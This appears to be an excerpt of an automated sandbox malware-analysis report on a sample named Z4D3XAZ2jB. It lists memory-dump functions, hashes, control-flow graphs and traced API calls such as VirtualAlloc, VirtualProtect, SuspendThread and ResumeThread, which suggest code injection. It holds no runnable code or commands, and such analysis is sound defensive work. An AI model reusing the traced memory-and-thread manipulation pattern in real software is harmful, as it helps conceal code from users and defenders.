                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "#0$#+0
                                                                                                                                • API String ID: 0-2817361697
                                                                                                                                • Opcode ID: 2af11a399d91191f5c4a47dc14e754834b7382159047a2ed87576556ab73f3e1
                                                                                                                                • Instruction ID: ca900eee73cf01aad32e69481b4f2a40abba7455f672a9bdf7c512f2d924a6d1
                                                                                                                                • Opcode Fuzzy Hash: 2af11a399d91191f5c4a47dc14e754834b7382159047a2ed87576556ab73f3e1
                                                                                                                                • Instruction Fuzzy Hash: 6251050FB596628CE31532BE71219FC6B41DFD1275B0846B7F15ECD0D74E08688A86E6
                                                                                                                                Function 00007FFD9B9194AD Relevance: .1, Instructions: 100COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754207568.00007FFD9B910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B910000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b910000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a347c9e841d8eeea2c1c960ce842025ffe3953d417e36d7caeab6df364540752
                                                                                                                                • Instruction ID: 0f4038f7b1d3a49d85d59b1c0dce087df82a42138d53cebd41c2aa722d74e595
                                                                                                                                • Opcode Fuzzy Hash: a347c9e841d8eeea2c1c960ce842025ffe3953d417e36d7caeab6df364540752
                                                                                                                                • Instruction Fuzzy Hash: 9631F670E18A1DCFCF84DF98D451AEDBBF1FB69300F60116AD419E3291D635A941CB44
                                                                                                                                Function 00007FFD9BE3CDD7 Relevance: 9.0, Strings: 7, Instructions: 239COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: v^^$v^^$Ct^^$St^^$ct^^$u^^$s^^
                                                                                                                                • API String ID: 0-1695519916
                                                                                                                                • Opcode ID: c87a6295ab39d216b5e9a83347de7437afd2782257d2eb463df392ed2e424415
                                                                                                                                • Instruction ID: c5b382548868e572a715d704f6b77ebd1dbc85106116b76d34e3535b924d649f
                                                                                                                                • Opcode Fuzzy Hash: c87a6295ab39d216b5e9a83347de7437afd2782257d2eb463df392ed2e424415
                                                                                                                                • Instruction Fuzzy Hash: D071D817E0E2A64EE722B7BC64714F93FA09F1166870941F7E0DD8E0E3DD09A54A86C5
                                                                                                                                Function 00007FFD9BE3CFD4 Relevance: 7.6, Strings: 6, Instructions: 119COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: t^^$t^^$Ct^^$St^^$ct^^$s^^
                                                                                                                                • API String ID: 0-3522859666
                                                                                                                                • Opcode ID: 1390a66396ed24668a072704d697b283eb7ee88a46ac3f15c566ca5fb7b56564
                                                                                                                                • Instruction ID: 74265795f50093ea300ac54920a1c39a866985f50f6595200e81ff2c9093a0f4
                                                                                                                                • Opcode Fuzzy Hash: 1390a66396ed24668a072704d697b283eb7ee88a46ac3f15c566ca5fb7b56564
                                                                                                                                • Instruction Fuzzy Hash: 48419113D0F3E61EEB1376B824754E93F619F1251870E41F7E0E98E0E3DE0A654A8695
                                                                                                                                Function 00007FFD9BE3CDCF Relevance: 6.4, Strings: 5, Instructions: 195COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Ct^^$St^^$ct^^$u^^$s^^
                                                                                                                                • API String ID: 0-2595321845
                                                                                                                                • Opcode ID: 1015141cbb2afef7df034ba55bcb8cace39baa97ae6af732dc52c782c03a0634
                                                                                                                                • Instruction ID: 50986cae52b0a585e991a183918c53b3277740ae7da14b543d8c7d2368bcfec8
                                                                                                                                • Opcode Fuzzy Hash: 1015141cbb2afef7df034ba55bcb8cace39baa97ae6af732dc52c782c03a0634
                                                                                                                                • Instruction Fuzzy Hash: E151DB17E0F2A64EE722B7FC24714F93F609F1262870941F7D0DD8E0E39D0A654686C4

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:6.4%
                                                                                                                                Dynamic/Decrypted Code Coverage:83.3%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:18
                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                execution_graph 32366 7ffd9b94c744 32367 7ffd9b94c74b ResumeThread 32366->32367 32369 7ffd9b94c854 32367->32369 32382 7ffd9b94af5d 32383 7ffd9b94af6b SuspendThread 32382->32383 32385 7ffd9b94b044 32383->32385 32378 7ffd9b7a295e 32379 7ffd9b7a296d VirtualProtect 32378->32379 32381 7ffd9b7a2aad 32379->32381 32386 7ffd9b94c8a9 32387 7ffd9b94c8b7 CloseHandle 32386->32387 32389 7ffd9b94c994 32387->32389 32374 7ffd9b7a434d 32375 7ffd9b7a436f VirtualAlloc 32374->32375 32377 7ffd9b7a4485 32375->32377 32370 7ffd9b94e525 32371 7ffd9b94e572 GetFileAttributesW 32370->32371 32373 7ffd9b94e605 32371->32373

                                                                                                                                Executed Functions

                                                                                                                                Function 00007FFD9B7D594F Relevance: 1.7, Strings: 1, Instructions: 461COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 40 7ffd9b7d594f-7ffd9b7d599a 41 7ffd9b7d599c-7ffd9b7d59a1 40->41 42 7ffd9b7d59a4-7ffd9b7d59ad 40->42 41->42 43 7ffd9b7d5e5b-7ffd9b7d5e61 42->43 44 7ffd9b7d5e67-7ffd9b7d5e80 43->44 45 7ffd9b7d59b2-7ffd9b7d59dc 43->45 46 7ffd9b7d59e3-7ffd9b7d59fc 45->46 47 7ffd9b7d59de 45->47 48 7ffd9b7d5a03-7ffd9b7d5a1d 46->48 49 7ffd9b7d59fe 46->49 47->46 51 7ffd9b7d5a24-7ffd9b7d5a3c 48->51 52 7ffd9b7d5a1f 48->52 49->48 53 7ffd9b7d5a43-7ffd9b7d5a64 51->53 54 7ffd9b7d5a3e 51->54 52->51 55 7ffd9b7d5a66-7ffd9b7d5a6a 53->55 56 7ffd9b7d5ad2-7ffd9b7d5aef 53->56 54->53 55->56 57 7ffd9b7d5a6c-7ffd9b7d5a80 55->57 58 7ffd9b7d5af6-7ffd9b7d5b0f 56->58 59 7ffd9b7d5af1 56->59 62 7ffd9b7d5ac4-7ffd9b7d5aca 57->62 60 7ffd9b7d5b16-7ffd9b7d5b30 58->60 61 7ffd9b7d5b11 58->61 59->58 63 7ffd9b7d5b37-7ffd9b7d5b4f 60->63 64 7ffd9b7d5b32 60->64 61->60 65 7ffd9b7d5acc-7ffd9b7d5acd 62->65 66 7ffd9b7d5a82-7ffd9b7d5a86 62->66 69 7ffd9b7d5b56-7ffd9b7d5b60 63->69 70 7ffd9b7d5b51 63->70 64->63 71 7ffd9b7d5b63-7ffd9b7d5baf 65->71 67 7ffd9b7d5a88-7ffd9b7d5a8e 66->67 68 7ffd9b7d5a91-7ffd9b7d5aa7 66->68 67->68 72 7ffd9b7d5aa9 68->72 73 7ffd9b7d5aae-7ffd9b7d5ac1 68->73 69->71 70->69 74 7ffd9b7d5bb1-7ffd9b7d5bc1 71->74 75 7ffd9b7d5bc4-7ffd9b7d5c5b 71->75 72->73 73->62 74->75 76 7ffd9b7d5c65-7ffd9b7d5d38 75->76 77 7ffd9b7d5c5d-7ffd9b7d5c62 75->77 79 7ffd9b7d5d3a-7ffd9b7d5d3e 76->79 80 7ffd9b7d5dab-7ffd9b7d5dc2 76->80 77->76 79->80 81 7ffd9b7d5d40-7ffd9b7d5d4f 79->81 82 7ffd9b7d5dc9-7ffd9b7d5de3 80->82 83 7ffd9b7d5dc4 80->83 84 7ffd9b7d5d9d-7ffd9b7d5da3 81->84 85 7ffd9b7d5dea-7ffd9b7d5e0e 82->85 86 7ffd9b7d5de5 82->86 83->82 89 7ffd9b7d5da5-7ffd9b7d5da6 84->89 90 7ffd9b7d5d51-7ffd9b7d5d55 84->90 87 7ffd9b7d5e15-7ffd9b7d5e39 85->87 88 7ffd9b7d5e10 85->88 86->85 93 7ffd9b7d5e3b 87->93 94 7ffd9b7d5e40-7ffd9b7d5e51 87->94 88->87 95 7ffd9b7d5e53-7ffd9b7d5e58 89->95 91 7ffd9b7d5d69-7ffd9b7d5d7a 90->91 92 7ffd9b7d5d57-7ffd9b7d5d66 90->92 96 7ffd9b7d5d7c 91->96 97 7ffd9b7d5d81-7ffd9b7d5d9a 91->97 92->91 93->94 94->95 95->43 96->97 97->84
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ikP.
                                                                                                                                • API String ID: 0-1166349263
                                                                                                                                • Opcode ID: 2ea35fc32cc8a439bca0aa054b98a571ef86ff2ca08a717c427906e9d3625dc3
                                                                                                                                • Instruction ID: 38f0364487cee7abf0e8d42df3ec7c44f39b365626074b230633471e0958f081
                                                                                                                                • Opcode Fuzzy Hash: 2ea35fc32cc8a439bca0aa054b98a571ef86ff2ca08a717c427906e9d3625dc3
                                                                                                                                • Instruction Fuzzy Hash: 53120770E0461D8FDB18DFA8C495AECBBF1FF88340F248669D41AEB255DA34A985CF50
                                                                                                                                Function 00007FFD9B7AB0DD Relevance: 1.3, Instructions: 1265COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0d6809500c5346ed7c558cd51ebbdcf1d3d0912d3e7b6255a7bf74145f80692c
                                                                                                                                • Instruction ID: a3881586968d0cf45a4ce51652976fe6cbc74ec5eea5e2f6e774c3c5ed7c2469
                                                                                                                                • Opcode Fuzzy Hash: 0d6809500c5346ed7c558cd51ebbdcf1d3d0912d3e7b6255a7bf74145f80692c
                                                                                                                                • Instruction Fuzzy Hash: B8B2C271A0991D8FDFA8EB58C895BA9B7B1FF98301F1042E9D01DD32A5DA356E81CF40
                                                                                                                                Function 00007FFD9B7AC5A8 Relevance: .8, Instructions: 778COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2bc8d1ef2f1ec4e0bfea14cdb72999e9f7e99698b7f489ef94a95f3a64c43180
                                                                                                                                • Instruction ID: a48b5056d5263d7febed46e673220d768f437e8e32dc916ea625b27473264675
                                                                                                                                • Opcode Fuzzy Hash: 2bc8d1ef2f1ec4e0bfea14cdb72999e9f7e99698b7f489ef94a95f3a64c43180
                                                                                                                                • Instruction Fuzzy Hash: D462E071A19A1D8FDBA8DB58C865BA9B7B1FF98300F1042E9D00DD72A5DE356E81CF40
                                                                                                                                Function 00007FFD9BE6A04F Relevance: .7, Instructions: 739COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e3caa70683f7e98e292e1bbe0d9130f959d7e166d5f2744bded3f4b7654b1ad9
                                                                                                                                • Instruction ID: d0afecccb59b3b3a57f43f99bc9b5e6b71fe5b431762b1776a9d7b0ecd3f7578
                                                                                                                                • Opcode Fuzzy Hash: e3caa70683f7e98e292e1bbe0d9130f959d7e166d5f2744bded3f4b7654b1ad9
                                                                                                                                • Instruction Fuzzy Hash: 8752CE30E1965DCFEB6CCF58C4A4AB87BA1FF58300F1055BDD45AC7296DA39AA81CB40
                                                                                                                                Function 00007FFD9B7AC84E Relevance: .7, Instructions: 721COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3f5d576c1824a2652c002cbac1d9a658d27c96f1263e85cefa34606e4f555ff8
                                                                                                                                • Instruction ID: 544e7306a6141dca6da53e5d5a30b3eb3bc984f00fa1090a5476c924c9319bdb
                                                                                                                                • Opcode Fuzzy Hash: 3f5d576c1824a2652c002cbac1d9a658d27c96f1263e85cefa34606e4f555ff8
                                                                                                                                • Instruction Fuzzy Hash: 0552DF71A09A1D8FDFA8DB58C865BA9B7B1FF98300F1042E9D01DD72A5DA356E81CF40
                                                                                                                                Function 00007FFD9B7AC782 Relevance: .7, Instructions: 684COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b1a3754498cea645dfedcab9c4373eae07d7d2d0282ca8cacb18c971de2d86b7
                                                                                                                                • Instruction ID: 7b327b7d48a67a7853600ea331ae6b6550a47e0391b85dd5300e5b672f027338
                                                                                                                                • Opcode Fuzzy Hash: b1a3754498cea645dfedcab9c4373eae07d7d2d0282ca8cacb18c971de2d86b7
                                                                                                                                • Instruction Fuzzy Hash: 4E42DE71A19A1D8FDFA8DB58C865BA9B7B1FB98301F1042E9D00DD32A5DA356E81CF40
                                                                                                                                Function 00007FFD9B7AC926 Relevance: .7, Instructions: 675COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d762afd92c2c03c75cb21f0ace66702a34720303d3bbc8739d0341024f96139b
                                                                                                                                • Instruction ID: 78dd3b85279a059420f1cdebbc3afbccfec805c39b7ee7453b3732dfe1101776
                                                                                                                                • Opcode Fuzzy Hash: d762afd92c2c03c75cb21f0ace66702a34720303d3bbc8739d0341024f96139b
                                                                                                                                • Instruction Fuzzy Hash: 0B42DF71A19A1D8FDFA8DB58C865BA9B7B1FF98300F1042E9D00DD72A1DA356E81CF40
                                                                                                                                Function 00007FFD9B7AC735 Relevance: .7, Instructions: 663COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c4fd31f76dbf6f97d1cfce52002f8a329f06a9319fa3e43b21dfec7de754f9ce
                                                                                                                                • Instruction ID: dc195230af39842b25a0931cafe366397aed91dd2355db9744d9f4bf33b1a539
                                                                                                                                • Opcode Fuzzy Hash: c4fd31f76dbf6f97d1cfce52002f8a329f06a9319fa3e43b21dfec7de754f9ce
                                                                                                                                • Instruction Fuzzy Hash: AB42DE71A19A1D8FDFA8DB58C865BA9B7B1FB98301F5042E9D00DD32A1DE356E81CF40
                                                                                                                                Function 00007FFD9B7AC90C Relevance: .6, Instructions: 647COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 061da34a7b245a2ee7998ae7a038f1b24daf6e3e53fababe65c0c1453a1bea8b
                                                                                                                                • Instruction ID: 5e89d91079db903e3e649057b5d4b98389bde43bb4adebc23bf56ff637f385f6
                                                                                                                                • Opcode Fuzzy Hash: 061da34a7b245a2ee7998ae7a038f1b24daf6e3e53fababe65c0c1453a1bea8b
                                                                                                                                • Instruction Fuzzy Hash: A242DF71A19A1D8FDFA8DB58C865BA9B7B1FB98300F1042E9D00DD32A1DE356E81CF40
                                                                                                                                Function 00007FFD9B7AC87E Relevance: .6, Instructions: 647COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9a1004e9e3692ee9983b46ccf8f2b561c64a53487d122b617fbeb4d022218463
                                                                                                                                • Instruction ID: 4bb11ee238215c3393ea31a7630b6db69f93c6039fb3cae65214280e948010be
                                                                                                                                • Opcode Fuzzy Hash: 9a1004e9e3692ee9983b46ccf8f2b561c64a53487d122b617fbeb4d022218463
                                                                                                                                • Instruction Fuzzy Hash: 6942DF71A19A1D8FDFA8DB58C865BA9B7B1FB98301F1042E9D00DD32A1DE356E81CF40
                                                                                                                                Function 00007FFD9B7AC919 Relevance: .6, Instructions: 644COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8d864e13f73676b6ceccbe9979eeccaad27ab6ae50dcb302fe84e477d61944c7
                                                                                                                                • Instruction ID: 56fc6905ecf5bcc49c099b840d4c3b47860edaa1ab4146c58e59fd03882fa5e2
                                                                                                                                • Opcode Fuzzy Hash: 8d864e13f73676b6ceccbe9979eeccaad27ab6ae50dcb302fe84e477d61944c7
                                                                                                                                • Instruction Fuzzy Hash: F442DF71A19A1D8FDFA8DB58C865BA9B7B1FB98301F1042E9D00DD32A5DE356E81CF40
                                                                                                                                Function 00007FFD9B7AC88B Relevance: .6, Instructions: 644COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8d864e13f73676b6ceccbe9979eeccaad27ab6ae50dcb302fe84e477d61944c7
                                                                                                                                • Instruction ID: 56fc6905ecf5bcc49c099b840d4c3b47860edaa1ab4146c58e59fd03882fa5e2
                                                                                                                                • Opcode Fuzzy Hash: 8d864e13f73676b6ceccbe9979eeccaad27ab6ae50dcb302fe84e477d61944c7
                                                                                                                                • Instruction Fuzzy Hash: F442DF71A19A1D8FDFA8DB58C865BA9B7B1FB98301F1042E9D00DD32A5DE356E81CF40
                                                                                                                                Function 00007FFD9B791AC5 Relevance: .3, Instructions: 272COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 68b2e1920d9d2e130644a242970e0461478fd32c2d09cfa8d194d5cb47c4d3f0
                                                                                                                                • Instruction ID: 94c0cd7fe514133cb6f8733ab85973ce5135d84184d0d0353e3d420620fa1ad3
                                                                                                                                • Opcode Fuzzy Hash: 68b2e1920d9d2e130644a242970e0461478fd32c2d09cfa8d194d5cb47c4d3f0
                                                                                                                                • Instruction Fuzzy Hash: 7CA19DB5A18A899FE798DF98D8657E97BE1FF55300F1002BBD00DD36E6DA782801C740
                                                                                                                                Function 00007FFD9B94E525 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 7ffd9b94e525-7ffd9b94e603 GetFileAttributesW 3 7ffd9b94e60b-7ffd9b94e649 0->3 4 7ffd9b94e605 0->4 4->3
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3047304272.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b940000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 3188754299-3372436214
                                                                                                                                • Opcode ID: e94ecfcb5f30a130b44711c82b4f3e0aa9a668c5fea97f005576a2a3432c91fe
                                                                                                                                • Instruction ID: 1f7caf3f1e0989d994e4d8d9b499aa2f2c72c2d80156f2654f894627dca7d204
                                                                                                                                • Opcode Fuzzy Hash: e94ecfcb5f30a130b44711c82b4f3e0aa9a668c5fea97f005576a2a3432c91fe
                                                                                                                                • Instruction Fuzzy Hash: A3410A70A08A1C8FDB98DF98D895BEDBBF0FB59310F10416ED049E7252DA75A845CF40
                                                                                                                                Function 00007FFD9B94C8A9 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 142COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3047304272.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b940000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseHandle
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 2962429428-3372436214
                                                                                                                                • Opcode ID: aaf8889280576387f31370338930f849bb935ae7f9d3b4ee835c7ed1fc6f7233
                                                                                                                                • Instruction ID: 00b4dddff49ffc0cb9f7174d2579fc764db93311728ccc2ad74f73ca5119bae1
                                                                                                                                • Opcode Fuzzy Hash: aaf8889280576387f31370338930f849bb935ae7f9d3b4ee835c7ed1fc6f7233
                                                                                                                                • Instruction Fuzzy Hash: 95415D30D0865C8FDB59DFA8C894BEDBBF0FF16311F1441AAD049D7292DA74A485CB01
                                                                                                                                Function 00007FFD9BFE0953 Relevance: 2.6, Strings: 2, Instructions: 89COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: &$@
                                                                                                                                • API String ID: 0-2538920678
                                                                                                                                • Opcode ID: be64546d9d8d0f2f061fd379ea10653ac519014a5b736a6acf216d8bf94f9b9d
                                                                                                                                • Instruction ID: e04205d808f94c90907c62fbf12b4ebe8ae5c046383e0a76be65ea7277992b82
                                                                                                                                • Opcode Fuzzy Hash: be64546d9d8d0f2f061fd379ea10653ac519014a5b736a6acf216d8bf94f9b9d
                                                                                                                                • Instruction Fuzzy Hash: 27318E31A0554E8FEB68EF94C4A56BD73A1FF54311F10027ED01E972A2CA396946CF40
                                                                                                                                Function 00007FFD9B7A295E Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 98 7ffd9b7a295e-7ffd9b7a296b 99 7ffd9b7a2976-7ffd9b7a2987 98->99 100 7ffd9b7a296d-7ffd9b7a2975 98->100 101 7ffd9b7a2989-7ffd9b7a2991 99->101 102 7ffd9b7a2992-7ffd9b7a2aab VirtualProtect 99->102 100->99 101->102 107 7ffd9b7a2aad 102->107 108 7ffd9b7a2ab3-7ffd9b7a2b03 102->108 107->108
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B79C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79C000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b79c000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 544645111-0
                                                                                                                                • Opcode ID: 8d61e8b671755d0e6674a3b96b5ab5e8b305e3a2567c2827190be53894b2b3f2
                                                                                                                                • Instruction ID: ed643e17d9c3b6062d592fb09e1dbda20f4b51d185f535cdaafd9dee47d1e889
                                                                                                                                • Opcode Fuzzy Hash: 8d61e8b671755d0e6674a3b96b5ab5e8b305e3a2567c2827190be53894b2b3f2
                                                                                                                                • Instruction Fuzzy Hash: CD518030D0874D8FDB55DFA8C885AEDBBF1FB66310F1042AAD449E3266DB74A885CB41
